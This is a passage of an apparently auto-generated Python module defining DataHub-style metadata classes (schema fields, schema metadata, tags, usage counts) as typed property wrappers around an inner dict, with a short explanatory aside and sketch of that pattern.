"""Getter: Platform independent field type of the field."""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: "SchemaFieldDataTypeClass") -> None:
"""Setter: Platform independent field type of the field."""
self._inner_dict['type'] = value
@property
def nativeDataType(self) -> str:
"""Getter: The native type of the field in the dataset's platform as declared by platform schema."""
return self._inner_dict.get('nativeDataType') # type: ignore
@nativeDataType.setter
def nativeDataType(self, value: str) -> None:
"""Setter: The native type of the field in the dataset's platform as declared by platform schema."""
self._inner_dict['nativeDataType'] = value
@property
def recursive(self) -> bool:
"""Getter: There are use cases when a field in type B references type A. A field in A references field of type B. In such cases, we will mark the first field as recursive."""
return self._inner_dict.get('recursive') # type: ignore
@recursive.setter
def recursive(self, value: bool) -> None:
"""Setter: There are use cases when a field in type B references type A. A field in A references field of type B. In such cases, we will mark the first field as recursive."""
self._inner_dict['recursive'] = value
@property
def globalTags(self) -> Union[None, "GlobalTagsClass"]:
"""Getter: Tags associated with the field"""
return self._inner_dict.get('globalTags') # type: ignore
@globalTags.setter
def globalTags(self, value: Union[None, "GlobalTagsClass"]) -> None:
"""Setter: Tags associated with the field"""
self._inner_dict['globalTags'] = value
@property
def glossaryTerms(self) -> Union[None, "GlossaryTermsClass"]:
"""Getter: Glossary terms associated with the field"""
return self._inner_dict.get('glossaryTerms') # type: ignore
@glossaryTerms.setter
def glossaryTerms(self, value: Union[None, "GlossaryTermsClass"]) -> None:
"""Setter: Glossary terms associated with the field"""
self._inner_dict['glossaryTerms'] = value
class SchemaFieldDataTypeClass(DictWrapper):
"""Schema field data types"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.SchemaFieldDataType")
def __init__(self,
type: Union["BooleanTypeClass", "FixedTypeClass", "StringTypeClass", "BytesTypeClass", "NumberTypeClass", "DateTypeClass", "TimeTypeClass", "EnumTypeClass", "NullTypeClass", "MapTypeClass", "ArrayTypeClass", "UnionTypeClass", "RecordTypeClass"],
):
super().__init__()
self.type = type
@classmethod
def construct_with_defaults(cls) -> "SchemaFieldDataTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.type = BooleanTypeClass.construct_with_defaults()
@property
def type(self) -> Union["BooleanTypeClass", "FixedTypeClass", "StringTypeClass", "BytesTypeClass", "NumberTypeClass", "DateTypeClass", "TimeTypeClass", "EnumTypeClass", "NullTypeClass", "MapTypeClass", "ArrayTypeClass", "UnionTypeClass", "RecordTypeClass"]:
"""Getter: Data platform specific types"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union["BooleanTypeClass", "FixedTypeClass", "StringTypeClass", "BytesTypeClass", "NumberTypeClass", "DateTypeClass", "TimeTypeClass", "EnumTypeClass", "NullTypeClass", "MapTypeClass", "ArrayTypeClass", "UnionTypeClass", "RecordTypeClass"]) -> None:
"""Setter: Data platform specific types"""
self._inner_dict['type'] = value
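# Illustrative sketch (not part of the generated module): building a
# platform-independent field type. SchemaFieldDataTypeClass wraps exactly one of
# the *TypeClass markers defined above; the field path and native type below are
# hypothetical.
#
#   field = SchemaFieldClass(
#       fieldPath="price",                                   # hypothetical
#       type=SchemaFieldDataTypeClass(type=NumberTypeClass()),
#       nativeDataType="DECIMAL(10,2)",                      # hypothetical native type
#   )
#
# nullable and recursive default to False when omitted, per the record schema.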
class SchemaMetadataClass(DictWrapper):
"""SchemaMetadata to describe metadata related to store schema"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.SchemaMetadata")
def __init__(self,
schemaName: str,
platform: str,
version: int,
hash: str,
platformSchema: Union["EspressoSchemaClass", "OracleDDLClass", "MySqlDDLClass", "PrestoDDLClass", "KafkaSchemaClass", "BinaryJsonSchemaClass", "OrcSchemaClass", "SchemalessClass", "KeyValueSchemaClass", "OtherSchemaClass"],
fields: List["SchemaFieldClass"],
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
dataset: Union[None, str]=None,
cluster: Union[None, str]=None,
primaryKeys: Union[None, List[str]]=None,
foreignKeysSpecs: Union[None, Dict[str, "ForeignKeySpecClass"]]=None,
):
super().__init__()
self.schemaName = schemaName
self.platform = platform
self.version = version
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.dataset = dataset
self.cluster = cluster
self.hash = hash
self.platformSchema = platformSchema
self.fields = fields
self.primaryKeys = primaryKeys
self.foreignKeysSpecs = foreignKeysSpecs
@classmethod
def construct_with_defaults(cls) -> "SchemaMetadataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.schemaName = str()
self.platform = str()
self.version = int()
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.dataset = self.RECORD_SCHEMA.field_map["dataset"].default
self.cluster = self.RECORD_SCHEMA.field_map["cluster"].default
self.hash = str()
self.platformSchema = EspressoSchemaClass.construct_with_defaults()
self.fields = list()
self.primaryKeys = self.RECORD_SCHEMA.field_map["primaryKeys"].default
self.foreignKeysSpecs = self.RECORD_SCHEMA.field_map["foreignKeysSpecs"].default
@property
def schemaName(self) -> str:
"""Getter: Schema name e.g. PageViewEvent, identity.Profile, ams.account_management_tracking"""
return self._inner_dict.get('schemaName') # type: ignore
@schemaName.setter
def schemaName(self, value: str) -> None:
"""Setter: Schema name e.g. PageViewEvent, identity.Profile, ams.account_management_tracking"""
self._inner_dict['schemaName'] = value
@property
def platform(self) -> str:
"""Getter: Standardized platform urn where schema is defined. The data platform Urn (urn:li:platform:{platform_name})"""
return self._inner_dict.get('platform') # type: ignore
@platform.setter
def platform(self, value: str) -> None:
"""Setter: Standardized platform urn where schema is defined. The data platform Urn (urn:li:platform:{platform_name})"""
self._inner_dict['platform'] = value
@property
def version(self) -> int:
"""Getter: Every change to SchemaMetadata in the resource results in a new version. Version is server assigned. This version is differ from platform native schema version."""
return self._inner_dict.get('version') # type: ignore
@version.setter
def version(self, value: int) -> None:
"""Setter: Every change to SchemaMetadata in the resource results in a new version. Version is server assigned. This version is differ from platform native schema version."""
self._inner_dict['version'] = value
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def dataset(self) -> Union[None, str]:
"""Getter: Dataset this schema metadata is associated with."""
return self._inner_dict.get('dataset') # type: ignore
@dataset.setter
def dataset(self, value: Union[None, str]) -> None:
"""Setter: Dataset this schema metadata is associated with."""
self._inner_dict['dataset'] = value
@property
def cluster(self) -> Union[None, str]:
"""Getter: The cluster this schema metadata resides from"""
return self._inner_dict.get('cluster') # type: ignore
@cluster.setter
def cluster(self, value: Union[None, str]) -> None:
"""Setter: The cluster this schema metadata resides from"""
self._inner_dict['cluster'] = value
@property
def hash(self) -> str:
"""Getter: the SHA1 hash of the schema content"""
return self._inner_dict.get('hash') # type: ignore
@hash.setter
def hash(self, value: str) -> None:
"""Setter: the SHA1 hash of the schema content"""
self._inner_dict['hash'] = value
@property
def platformSchema(self) -> Union["EspressoSchemaClass", "OracleDDLClass", "MySqlDDLClass", "PrestoDDLClass", "KafkaSchemaClass", "BinaryJsonSchemaClass", "OrcSchemaClass", "SchemalessClass", "KeyValueSchemaClass", "OtherSchemaClass"]:
"""Getter: The native schema in the dataset's platform."""
return self._inner_dict.get('platformSchema') # type: ignore
@platformSchema.setter
def platformSchema(self, value: Union["EspressoSchemaClass", "OracleDDLClass", "MySqlDDLClass", "PrestoDDLClass", "KafkaSchemaClass", "BinaryJsonSchemaClass", "OrcSchemaClass", "SchemalessClass", "KeyValueSchemaClass", "OtherSchemaClass"]) -> None:
"""Setter: The native schema in the dataset's platform."""
self._inner_dict['platformSchema'] = value
@property
def fields(self) -> List["SchemaFieldClass"]:
"""Getter: Client provided a list of fields from document schema."""
return self._inner_dict.get('fields') # type: ignore
@fields.setter
def fields(self, value: List["SchemaFieldClass"]) -> None:
"""Setter: Client provided a list of fields from document schema."""
self._inner_dict['fields'] = value
@property
def primaryKeys(self) -> Union[None, List[str]]:
"""Getter: Client provided list of fields that define primary keys to access record. Field order defines hierarchical espresso keys. Empty lists indicates absence of primary key access patter. Value is a SchemaField@fieldPath."""
return self._inner_dict.get('primaryKeys') # type: ignore
@primaryKeys.setter
def primaryKeys(self, value: Union[None, List[str]]) -> None:
"""Setter: Client provided list of fields that define primary keys to access record. Field order defines hierarchical espresso keys. Empty lists indicates absence of primary key access patter. Value is a SchemaField@fieldPath."""
self._inner_dict['primaryKeys'] = value
@property
def foreignKeysSpecs(self) -> Union[None, Dict[str, "ForeignKeySpecClass"]]:
"""Getter: Map captures all the references schema makes to external datasets. Map key is ForeignKeySpecName typeref."""
return self._inner_dict.get('foreignKeysSpecs') # type: ignore
@foreignKeysSpecs.setter
def foreignKeysSpecs(self, value: Union[None, Dict[str, "ForeignKeySpecClass"]]) -> None:
"""Setter: Map captures all the references schema makes to external datasets. Map key is ForeignKeySpecName typeref."""
self._inner_dict['foreignKeysSpecs'] = value
class SchemalessClass(DictWrapper):
"""The dataset has no specific schema associated with it"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.Schemaless")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "SchemalessClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class StringTypeClass(DictWrapper):
"""String field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.StringType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "StringTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class TimeTypeClass(DictWrapper):
"""Time field type. This should also be used for datetimes."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.TimeType")
def __init__(self,
):
super().__init__()
@classmethod
def construct_with_defaults(cls) -> "TimeTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
pass
class UnionTypeClass(DictWrapper):
"""Union field type."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.UnionType")
def __init__(self,
nestedTypes: Union[None, List[str]]=None,
):
super().__init__()
self.nestedTypes = nestedTypes
@classmethod
def construct_with_defaults(cls) -> "UnionTypeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.nestedTypes = self.RECORD_SCHEMA.field_map["nestedTypes"].default
@property
def nestedTypes(self) -> Union[None, List[str]]:
"""Getter: List of types in union type."""
return self._inner_dict.get('nestedTypes') # type: ignore
@nestedTypes.setter
def nestedTypes(self, value: Union[None, List[str]]) -> None:
"""Setter: List of types in union type."""
self._inner_dict['nestedTypes'] = value
class UrnForeignKeyClass(DictWrapper):
"""If SchemaMetadata fields make any external references and references are of type com.linkedin.pegasus2avro.common.Urn or any children, this models can be used to mark it."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.schema.UrnForeignKey")
def __init__(self,
currentFieldPath: str,
):
super().__init__()
self.currentFieldPath = currentFieldPath
@classmethod
def construct_with_defaults(cls) -> "UrnForeignKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.currentFieldPath = str()
@property
def currentFieldPath(self) -> str:
"""Getter: Field in hosting(current) SchemaMetadata."""
return self._inner_dict.get('currentFieldPath') # type: ignore
@currentFieldPath.setter
def currentFieldPath(self, value: str) -> None:
"""Setter: Field in hosting(current) SchemaMetadata."""
self._inner_dict['currentFieldPath'] = value
class TagPropertiesClass(DictWrapper):
"""Properties associated with a Tag"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.tag.TagProperties")
def __init__(self,
name: str,
description: Union[None, str]=None,
):
super().__init__()
self.name = name
self.description = description
@classmethod
def construct_with_defaults(cls) -> "TagPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def name(self) -> str:
"""Getter: Name of the tag"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the tag"""
self._inner_dict['name'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the tag"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the tag"""
self._inner_dict['description'] = value
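Classes such as `TagPropertiesClass` above all follow the same generated pattern: typed `@property` getters and setters that delegate to an inner dict, so an instance can be serialized directly from `_inner_dict`. A minimal standalone sketch of that pattern (simplified, without the Avro `RECORD_SCHEMA` machinery; `DictWrapperSketch` is a hypothetical stand-in):

```python
class DictWrapperSketch:
    """Simplified stand-in for the generated DictWrapper pattern:
    typed properties backed by a plain dict."""

    def __init__(self, name: str, description: str = None):
        self._inner_dict = {}
        # Going through the setters keeps _inner_dict as the single
        # source of truth, just like the generated classes above.
        self.name = name
        self.description = description

    @property
    def name(self) -> str:
        return self._inner_dict.get('name')

    @name.setter
    def name(self, value: str) -> None:
        self._inner_dict['name'] = value

    @property
    def description(self) -> str:
        return self._inner_dict.get('description')

    @description.setter
    def description(self, value: str) -> None:
        self._inner_dict['description'] = value


tag = DictWrapperSketch(name="pii", description="Personally identifiable information")
```

Because every attribute access reads and writes the same dict, mutating a property is immediately visible in the serialized form and vice versa.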
class FieldUsageCountsClass(DictWrapper):
""" Records field-level usage counts for a given resource """
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.usage.FieldUsageCounts")
def __init__(self,
fieldName: str,
count: int,
):
super().__init__()
self.fieldName = fieldName
self.count = count
@classmethod
def construct_with_defaults(cls) -> "FieldUsageCountsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.fieldName = str()
self.count = int()
@property
def fieldName(self) -> str:
# No docs available.
return self._inner_dict.get('fieldName') # type: ignore
@fieldName.setter
def fieldName(self, value: str) -> None:
# No docs available.
self._inner_dict['fieldName'] = value
@property
def count(self) -> int:
# No docs available.
return self._inner_dict.get('count') # type: ignore
@count.setter
def count(self, value: int) -> None:
# No docs available.
self._inner_dict['count'] = value
class UsageAggregationClass(DictWrapper):
"""Usage data for a given resource, rolled up into a bucket."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.usage.UsageAggregation")
def __init__(self,
bucket: int,
duration: Union[str, "WindowDurationClass"],
resource: str,
metrics: "UsageAggregationMetricsClass",
):
super().__init__()
self.bucket = bucket
self.duration = duration
self.resource = resource
self.metrics = metrics
@classmethod
def construct_with_defaults(cls) -> "UsageAggregationClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.bucket = int()
self.duration = WindowDurationClass.YEAR
self.resource = str()
self.metrics = UsageAggregationMetricsClass.construct_with_defaults()
@property
def bucket(self) -> int:
"""Getter: Bucket start time in milliseconds """
return self._inner_dict.get('bucket') # type: ignore
@bucket.setter
def bucket(self, value: int) -> None:
"""Setter: Bucket start time in milliseconds """
self._inner_dict['bucket'] = value
@property
def duration(self) -> Union[str, "WindowDurationClass"]:
"""Getter: Bucket duration """
return self._inner_dict.get('duration') # type: ignore
@duration.setter
def duration(self, value: Union[str, "WindowDurationClass"]) -> None:
"""Setter: Bucket duration """
self._inner_dict['duration'] = value
@property
def resource(self) -> str:
"""Getter: Resource associated with these usage stats """
return self._inner_dict.get('resource') # type: ignore
@resource.setter
def resource(self, value: str) -> None:
"""Setter: Resource associated with these usage stats """
self._inner_dict['resource'] = value
@property
def metrics(self) -> "UsageAggregationMetricsClass":
"""Getter: Metrics associated with this bucket """
return self._inner_dict.get('metrics') # type: ignore
@metrics.setter
def metrics(self, value: "UsageAggregationMetricsClass") -> None:
"""Setter: Metrics associated with this bucket """
self._inner_dict['metrics'] = value
class UsageAggregationMetricsClass(DictWrapper):
"""Metrics for usage data for a given resource and bucket. Not all fields
make sense for all buckets, so every field is optional."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.usage.UsageAggregationMetrics")
def __init__(self,
uniqueUserCount: Union[None, int]=None,
users: Union[None, List["UserUsageCountsClass"]]=None,
totalSqlQueries: Union[None, int]=None,
topSqlQueries: Union[None, List[str]]=None,
fields: Union[None, List["FieldUsageCountsClass"]]=None,
):
super().__init__()
self.uniqueUserCount = uniqueUserCount
self.users = users
self.totalSqlQueries = totalSqlQueries
self.topSqlQueries = topSqlQueries
self.fields = fields
@classmethod
def construct_with_defaults(cls) -> "UsageAggregationMetricsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.uniqueUserCount = self.RECORD_SCHEMA.field_map["uniqueUserCount"].default
self.users = self.RECORD_SCHEMA.field_map["users"].default
self.totalSqlQueries = self.RECORD_SCHEMA.field_map["totalSqlQueries"].default
self.topSqlQueries = self.RECORD_SCHEMA.field_map["topSqlQueries"].default
self.fields = self.RECORD_SCHEMA.field_map["fields"].default
@property
def uniqueUserCount(self) -> Union[None, int]:
"""Getter: Unique user count """
return self._inner_dict.get('uniqueUserCount') # type: ignore
@uniqueUserCount.setter
def uniqueUserCount(self, value: Union[None, int]) -> None:
"""Setter: Unique user count """
self._inner_dict['uniqueUserCount'] = value
@property
def users(self) -> Union[None, List["UserUsageCountsClass"]]:
"""Getter: Users within this bucket, with frequency counts """
return self._inner_dict.get('users') # type: ignore
@users.setter
def users(self, value: Union[None, List["UserUsageCountsClass"]]) -> None:
"""Setter: Users within this bucket, with frequency counts """
self._inner_dict['users'] = value
@property
def totalSqlQueries(self) -> Union[None, int]:
"""Getter: Total SQL query count """
return self._inner_dict.get('totalSqlQueries') # type: ignore
@totalSqlQueries.setter
def totalSqlQueries(self, value: Union[None, int]) -> None:
"""Setter: Total SQL query count """
self._inner_dict['totalSqlQueries'] = value
@property
def topSqlQueries(self) -> Union[None, List[str]]:
"""Getter: Frequent SQL queries; mostly makes sense for datasets in SQL databases """
return self._inner_dict.get('topSqlQueries') # type: ignore
@topSqlQueries.setter
def topSqlQueries(self, value: Union[None, List[str]]) -> None:
"""Setter: Frequent SQL queries; mostly makes sense for datasets in SQL databases """
self._inner_dict['topSqlQueries'] = value
@property
def fields(self) -> Union[None, List["FieldUsageCountsClass"]]:
"""Getter: Field-level usage stats """
return self._inner_dict.get('fields') # type: ignore
@fields.setter
def fields(self, value: Union[None, List["FieldUsageCountsClass"]]) -> None:
"""Setter: Field-level usage stats """
self._inner_dict['fields'] = value
class UserUsageCountsClass(DictWrapper):
""" Records a single user's usage counts for a given resource """
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.usage.UserUsageCounts")
def __init__(self,
count: int,
user: Union[None, str]=None,
userEmail: Union[None, str]=None,
):
super().__init__()
self.user = user
self.count = count
self.userEmail = userEmail
@classmethod
def construct_with_defaults(cls) -> "UserUsageCountsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.user = self.RECORD_SCHEMA.field_map["user"].default
self.count = int()
self.userEmail = self.RECORD_SCHEMA.field_map["userEmail"].default
@property
def user(self) -> Union[None, str]:
# No docs available.
return self._inner_dict.get('user') # type: ignore
@user.setter
def user(self, value: Union[None, str]) -> None:
# No docs available.
self._inner_dict['user'] = value
@property
def count(self) -> int:
# No docs available.
return self._inner_dict.get('count') # type: ignore
@count.setter
def count(self, value: int) -> None:
# No docs available.
self._inner_dict['count'] = value
@property
def userEmail(self) -> Union[None, str]:
"""Getter: If user_email is set, we attempt to resolve the user's urn upon ingest """
return self._inner_dict.get('userEmail') # type: ignore
@userEmail.setter
def userEmail(self, value: Union[None, str]) -> None:
"""Setter: If user_email is set, we attempt to resolve the user's urn upon ingest """
self._inner_dict['userEmail'] = value
__SCHEMA_TYPES = {
'com.linkedin.events.KafkaAuditHeader': KafkaAuditHeaderClass,
'com.linkedin.pegasus2avro.chart.ChartInfo': ChartInfoClass,
'com.linkedin.pegasus2avro.chart.ChartQuery': ChartQueryClass,
'com.linkedin.pegasus2avro.chart.ChartQueryType': ChartQueryTypeClass,
'com.linkedin.pegasus2avro.chart.ChartType': ChartTypeClass,
'com.linkedin.pegasus2avro.chart.EditableChartProperties': EditableChartPropertiesClass,
'com.linkedin.pegasus2avro.common.AccessLevel': AccessLevelClass,
'com.linkedin.pegasus2avro.common.AuditStamp': AuditStampClass,
'com.linkedin.pegasus2avro.common.BrowsePaths': BrowsePathsClass,
'com.linkedin.pegasus2avro.common.ChangeAuditStamps': ChangeAuditStampsClass,
'com.linkedin.pegasus2avro.common.Cost': CostClass,
'com.linkedin.pegasus2avro.common.CostCost': CostCostClass,
'com.linkedin.pegasus2avro.common.CostCostDiscriminator': CostCostDiscriminatorClass,
'com.linkedin.pegasus2avro.common.CostType': CostTypeClass,
'com.linkedin.pegasus2avro.common.Deprecation': DeprecationClass,
'com.linkedin.pegasus2avro.common.FabricType': FabricTypeClass,
'com.linkedin.pegasus2avro.common.GlobalTags': GlobalTagsClass,
'com.linkedin.pegasus2avro.common.GlossaryTermAssociation': GlossaryTermAssociationClass,
'com.linkedin.pegasus2avro.common.GlossaryTerms': GlossaryTermsClass,
'com.linkedin.pegasus2avro.common.InstitutionalMemory': InstitutionalMemoryClass,
'com.linkedin.pegasus2avro.common.InstitutionalMemoryMetadata': InstitutionalMemoryMetadataClass,
'com.linkedin.pegasus2avro.common.MLFeatureDataType': MLFeatureDataTypeClass,
'com.linkedin.pegasus2avro.common.Owner': OwnerClass,
'com.linkedin.pegasus2avro.common.Ownership': OwnershipClass,
'com.linkedin.pegasus2avro.common.OwnershipSource': OwnershipSourceClass,
'com.linkedin.pegasus2avro.common.OwnershipSourceType': OwnershipSourceTypeClass,
'com.linkedin.pegasus2avro.common.OwnershipType': OwnershipTypeClass,
'com.linkedin.pegasus2avro.common.Status': StatusClass,
'com.linkedin.pegasus2avro.common.TagAssociation': TagAssociationClass,
'com.linkedin.pegasus2avro.common.VersionTag': VersionTagClass,
'com.linkedin.pegasus2avro.common.WindowDuration': WindowDurationClass,
'com.linkedin.pegasus2avro.common.fieldtransformer.TransformationType': TransformationTypeClass,
'com.linkedin.pegasus2avro.common.fieldtransformer.UDFTransformer': UDFTransformerClass,
'com.linkedin.pegasus2avro.dashboard.DashboardInfo': DashboardInfoClass,
'com.linkedin.pegasus2avro.dashboard.EditableDashboardProperties': EditableDashboardPropertiesClass,
'com.linkedin.pegasus2avro.datajob.DataFlowInfo': DataFlowInfoClass,
'com.linkedin.pegasus2avro.datajob.DataJobInfo': DataJobInfoClass,
'com.linkedin.pegasus2avro.datajob.DataJobInputOutput': DataJobInputOutputClass,
'com.linkedin.pegasus2avro.datajob.EditableDataFlowProperties': EditableDataFlowPropertiesClass,
'com.linkedin.pegasus2avro.datajob.EditableDataJobProperties': EditableDataJobPropertiesClass,
'com.linkedin.pegasus2avro.datajob.JobStatus': JobStatusClass,
'com.linkedin.pegasus2avro.datajob.azkaban.AzkabanJobType': AzkabanJobTypeClass,
'com.linkedin.pegasus2avro.dataplatform.DataPlatformInfo': DataPlatformInfoClass,
'com.linkedin.pegasus2avro.dataplatform.PlatformType': PlatformTypeClass,
'com.linkedin.pegasus2avro.dataprocess.DataProcessInfo': DataProcessInfoClass,
'com.linkedin.pegasus2avro.dataset.DatasetDeprecation': DatasetDeprecationClass,
'com.linkedin.pegasus2avro.dataset.DatasetFieldMapping': DatasetFieldMappingClass,
'com.linkedin.pegasus2avro.dataset.DatasetLineageType': DatasetLineageTypeClass,
'com.linkedin.pegasus2avro.dataset.DatasetProperties': DatasetPropertiesClass,
'com.linkedin.pegasus2avro.dataset.DatasetUpstreamLineage': DatasetUpstreamLineageClass,
'com.linkedin.pegasus2avro.dataset.EditableDatasetProperties': EditableDatasetPropertiesClass,
'com.linkedin.pegasus2avro.dataset.Upstream': UpstreamClass,
'com.linkedin.pegasus2avro.dataset.UpstreamLineage': UpstreamLineageClass,
'com.linkedin.pegasus2avro.glossary.GlossaryNodeInfo': GlossaryNodeInfoClass,
'com.linkedin.pegasus2avro.glossary.GlossaryTermInfo': GlossaryTermInfoClass,
'com.linkedin.pegasus2avro.identity.CorpGroupInfo': CorpGroupInfoClass,
'com.linkedin.pegasus2avro.identity.CorpUserEditableInfo': CorpUserEditableInfoClass,
'com.linkedin.pegasus2avro.identity.CorpUserInfo': CorpUserInfoClass,
'com.linkedin.pegasus2avro.metadata.key.ChartKey': ChartKeyClass,
'com.linkedin.pegasus2avro.metadata.key.CorpGroupKey': CorpGroupKeyClass,
'com.linkedin.pegasus2avro.metadata.key.CorpUserKey': CorpUserKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DashboardKey': DashboardKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DataFlowKey': DataFlowKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DataJobKey': DataJobKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DataPlatformKey': DataPlatformKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DataProcessKey': DataProcessKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DatasetKey': DatasetKeyClass,
'com.linkedin.pegasus2avro.metadata.key.GlossaryNodeKey': GlossaryNodeKeyClass,
'com.linkedin.pegasus2avro.metadata.key.GlossaryTermKey': GlossaryTermKeyClass,
'com.linkedin.pegasus2avro.metadata.key.MLFeatureKey': MLFeatureKeyClass,
'com.linkedin.pegasus2avro.metadata.key.MLFeatureTableKey': MLFeatureTableKeyClass,
'com.linkedin.pegasus2avro.metadata.key.MLModelKey': MLModelKeyClass,
'com.linkedin.pegasus2avro.metadata.key.MLPrimaryKeyKey': MLPrimaryKeyKeyClass,
'com.linkedin.pegasus2avro.metadata.key.TagKey': TagKeyClass,
'com.linkedin.pegasus2avro.metadata.snapshot.ChartSnapshot': ChartSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.CorpGroupSnapshot': CorpGroupSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.CorpUserSnapshot': CorpUserSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DashboardSnapshot': DashboardSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DataFlowSnapshot': DataFlowSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DataJobSnapshot': DataJobSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DataPlatformSnapshot': DataPlatformSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DataProcessSnapshot': DataProcessSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DatasetSnapshot': DatasetSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.GlossaryNodeSnapshot': GlossaryNodeSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.GlossaryTermSnapshot': GlossaryTermSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.MLFeatureSnapshot': MLFeatureSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.MLFeatureTableSnapshot': MLFeatureTableSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.MLModelSnapshot': MLModelSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.MLPrimaryKeySnapshot': MLPrimaryKeySnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.TagSnapshot': TagSnapshotClass,
'com.linkedin.pegasus2avro.ml.metadata.BaseData': BaseDataClass,
'com.linkedin.pegasus2avro.ml.metadata.CaveatDetails': CaveatDetailsClass,
'com.linkedin.pegasus2avro.ml.metadata.CaveatsAndRecommendations': CaveatsAndRecommendationsClass,
'com.linkedin.pegasus2avro.ml.metadata.EthicalConsiderations': EthicalConsiderationsClass,
